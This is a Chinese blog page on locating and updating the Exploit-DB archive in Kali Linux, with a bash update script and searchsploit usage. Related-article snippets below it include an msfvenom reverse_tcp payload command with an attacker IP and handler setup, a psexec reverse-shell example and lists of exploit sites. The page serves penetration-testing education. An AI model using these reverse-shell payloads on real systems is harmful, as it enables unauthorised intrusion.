kali linux漏洞,Kali Linux中升级exploit-db漏洞库

最新推荐文章于 2024-04-10 17:00:58 发布
最新推荐文章于 2024-04-10 17:00:58 发布
阅读量1.7k 收藏 1
点赞数
文章标签: kali linux漏洞

Kali Linux已经内置了一个由” Offebnsive Security”提供的漏洞利用程序集的数据库Exploit-DB,可以用于平时的参考和使用。访问的方法是在命令提示符中输入一下命令:

# cd /pentest/exploits/exploitdb/

# cat files.csv | less

即可查看所有内置的漏洞利用程序集,这将会打开Exploit-DB在/pentest/exploits/exploitdb/platforms目录下当前所有的漏洞利用程序列表。这些漏洞利用程序按各自对应的操作系统(Window、Linux、HP-UX、Novell、Solaris、BSD等),保存在不同的子目录下。大多数漏洞利用程序使用C、perl、python、Ruby、PHP以及其他一些编程技术开发,BT5中已经包含了相对应的编译器或解释器。用来支持这些语言程序的运行。

13261754f7e8f922147OeP9eq.jpg

想要升级Exploit-DB,在BT4下,可以依次点击:Backtrack-》Pentestion-》ExploitDB-》Update Exploitdb  进行Exploit-DB的更新

但是在Kali Linux下没有提供升级脚本,我们可以利用以下的升级脚本来升级Exploit-DB:

#!/bin/bash

echo "Updating The Exploit-DB"

cd /usr/share/exploitdb/

wget http://www.exploit-db.com/archive.tar.bz2

tar -xvjf /usr/share/exploitdb/archive.tar.bz2

rm /usr/share/exploitdb/archive.tar.bz2

echo "Exploit-DB Update Finished"

将脚本复制,保存文件名为dbupdate.sh。在用以下的命令进行升级:

#  Chmod +x dbupdate.sh

#  ./ dbupdate.sh

升级完成后就可以使用searchsploit命令来搜索exp就行利用了,搜索的命令是:

./ searchsploit 关键字

如果我想从漏洞程序利用列表中抽取特定的信息那该怎么办呢?利用强大的bash,你可以方便地操作任

吴羽舒
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali linux 学习笔记(九十一)metasploit framework——exploit模块 2020.4.24
闵行小鱼塘
04-27 663
本节学习exploit模块
getExploit:从exploit-db.com下载漏洞利用程序
05-25
Kali Linux存在类似的脚本,但是不同的是,此python脚本在搜索和下载时将提供更大的灵活性。用法运行getExploit.py脚本以在文本界面输入。 注意:如果是首次运行,该脚本将在启动时自动下载最新的漏洞利用程序...
kali更新exploit-db
iteye_16188的博客
12-12 1254
[code="java"]cd /usr/share/exploitdb wget http://www.exploit-db.com/archive.tar.bz2 tar -xvjf archive.tar.bz2 rm archive.tar.bz2[/code]
kali的docker更新vulhub漏洞环境
薛定谔嘚喵博客
04-16 1069
kali的vulhub漏洞复现时,找不到Weblogic目录下CVE-2023-21839的漏洞环境。方法二:暴力一点,直接将vulhub删除掉,再重新部署vulhub。Weblogic目录下已经有了最新的CVE-2023-21839漏洞。方法一:更新最新的vulhub漏洞环境。因为之前已经更新过了。重新部署vulhub。
exploitdb update
cnbird's blog
01-03 560
exploitdb: svn co svn://devel.offensive-security.com/exploitdb
metasploit update exploit-db
weixin_30840573的博客
02-03 165
echo "Updating The Exploit-DB" cd /usr/share/exploitdb/ wget http://www.exploit-db.com/archive.tar.bz2 tar -xvjf /usr/share/exploitdb/archive.tar.bz2 rm /usr/share/exploitdb/archive.tar.bz2 echo ...
2021Kali系列 -- 漏洞搜索(searchsploit)
weixin_41489908的博客
04-22 4041
我以为我不理你,你会难过,可结果呢,难过的是我。。。 ---- 网易云热评 简介:通过搜索关键词找到需要的漏洞,可以理解为一个离线的漏洞 一、命令 searchsploit 1、-c --case搜索时区分大小写,默认不区分大小写 2、-e --exact 精确搜索,比如:搜索“ WordPress 4.1”时,结果绝对不会出现 “WordPress Core 4.1” 3、-s --strict 精确搜索,输入值必须存在 4、-t --tittle搜索exploit标题 5、-...
kali-linux 工具Metasploit离线式攻击使用教程
12-29
在IT安全领域,Kali Linux是一款著名的开源渗透测试操作系统,其包含了各种安全工具,而Metasploit则是其的重要组件之一,主要用于进行安全漏洞利用和红队演练。本教程将聚焦于Metasploit的离线攻击使用方法,这...
Linux入侵常用命令之防黑客示例代码
09-15
文章列举了一些exploit资源网站,如`http://tools.90sec.org/`,`http://sebug.net/paper/linux_exp/`,`http://x73.cc/bitch/exp/`,`http://www.exploit-db.com/search/`,供黑客查找可能的利用手段。...
Linux提权思路+实战 _ Mugen1
08-03
在寻找内核漏洞时,可以使用`searchsploit`工具查询exploit-db数据的相关漏洞利用代码。确定系统的发行版本和内核版本(如`cat /etc/issue`,`cat /etc/*-release` 和 `uname -a`)是查找适用漏洞的前提。 一旦...
记一次phpmailer漏洞+UDF提权.pdf
03-14
PHPMailer漏洞+UDF提权渗透过程 PHPMailer漏洞是指在PHPMailer存在的漏洞,可以被攻击者利用来进行提权攻击。该漏洞的存在是由于PHPMailer在处理邮件附件时没有正确地验证用户输入,...https://www.exploit-db.com/
Kali-利用metasploitexploit/multi/handler进行攻击
齐泽文的Blog
04-22 1万+
在攻击服务器上生成连接软件,LHOST为攻击机IP地址msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台root@qzwhost:~# msfconsole msfconsole > use exploit/multi/handl...
kali】Mestasploit——基本使用2、Exploit模块、playload、metepreter
(∪.∪ )...zzz的博客
10-27 1199
这里写自定义目录标题Exploit模块1. Active exploitpsexec2. Passive Exploits Exploit模块 1. Active exploit 攻击者主动连接受害者 payload发给受害者执行 psexec use exploit/windows/smb/psexec # 基于smb协议 # 需要目标机的权限 # 利用psexec模块 # 在132上执行该模块的payload后将shell反弹给161kali的4444端口 set RHOST 192.168.98
Kali linux 2016.2(Rolling)Exploits模块详解
weixin_34205076的博客
05-22 3119
         简单来将,这个Exploits模块,就是针对不同的已知漏洞的利用程序。   root@kali:~# msfconsole Unable to handle kernel NULL pointer dereference at virtual addre...
kali linux怎么编译软件包,如何在Kali Linux下编译Windows Exploit(示例代码)
weixin_30941215的博客
05-02 191
前言微软的Windows在企业或是个人应用领域占据着最大的市场份额,在渗透测试过程你会经常遇到很多Windows的工作站和服务器。另一方面,大多数渗透测试人员主要使用基于Linux的发行版渗透测试系统,比如Kali Linux或者Pentoo和Backbox。因此你可能就需要有在Linux机器上快速编译WindowsExploit的能力。一款叫做“Mingw-w64”的软件可以解决这个问题。M...
kaliexploitdb漏洞的具体位置
a1_pha的博客
01-03 447
exploitdb查询漏洞指令。kali漏洞的位置。
searchsploit工具(exploit-db.com)使用实例 (linux 内核漏洞提权) exploitdb
whatday的专栏
10-30 6132
获取 root 权限是 Linux 漏洞利用的终极目标。跟 Windows 的 System 用户一样,root 用户拥有对操作系统的所有管理权限。在渗透,有时候成功利用某些漏洞只会获取一个低权限用户,所以需要使用提权技巧,提升到权限更高的 root 用户,完全控制整个系统。 一般来说,获取到低权限 shell 后我们通常会做下面几件事: 1. 检测操作系统的发行版本 2. 查看内核版本 3...
Metasploit 手动更新漏洞及之后Armitage的配置
热门推荐
code_lab
08-30 1万+
没想到大部分的时间都花费在了这种地方 (┭┮﹏┭┮)在kali2.0msfupdate并不能更新漏洞,需要从https://www.rapid7.com/products/metasploit/download.jsp 下载Metasploit的安装包进行更新,更新完成后打开Metasploit并使用version或者show exploits查看更新之后的版本或者更新的exploits I
kali渗透攻击
最新发布
tanjing7584239的博客
04-10 1732
通过不断地尝试和实践,我逐渐掌握了这些工具的使用方法,并能够在模拟环境成功地进行渗透测试。在学习的过程,我深刻体会到了网络安全的重要性。通过不断学习和实践,我逐渐掌握了渗透测试的基本技能和方法,并能够在实际工作应用这些技能来发现和解决安全问题。我相信在未来的学习和工作,我会继续努力提高自己的网络安全水平,为网络安全事业做出更大的贡献。因此,在进行渗透测试之前,必须获得授权和许可,并严格遵守相关的法律法规和道德规范。通过这段时间的学习和实践,我收获颇丰,也深刻体会到了渗透测试的重要性与复杂性。
kalilinux漏洞分析
08-29
Kalilinux是一个基于Debian的Linux发行版,主要用于渗透测试和漏洞分析。漏洞分析是指对软件或系统漏洞进行研究和分析,以了解其原理和潜在的风险。 在Kalilinux,你可以使用各种工具和技术来进行漏洞分析。以下是一些常用的工具和步骤: 1. 信息收集:使用工具如nmap、Recon-ng等来获取目标系统的信息,包括开放端口、服务版本等。 2. 漏洞扫描:使用工具如Nessus、OpenVAS等来扫描目标系统已知的漏洞,并生成相应的报告。 3. 漏洞利用:根据扫描结果,使用工具如MetasploitExploitDB等来实施漏洞利用,以验证漏洞的存在和潜在的威胁。 4. 漏洞分析:对已知的或自己发现的漏洞进行深入分析,了解其原理和可能导致的安全问题。 5. 代码审计:对软件或系统的源代码进行审计,发现潜在的安全漏洞和弱点。 6. 报告和修复:将漏洞分析的结果整理成报告,并提供相应的建议和修复方案,以帮助开发者和系统管理员解决漏洞问题。 需要注意的是,漏洞分析是一项复杂和敏感的任务,需要具备相关的知识和技能。在进行漏洞分析时,必须遵守法律和道德规范,并获得合法的授权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值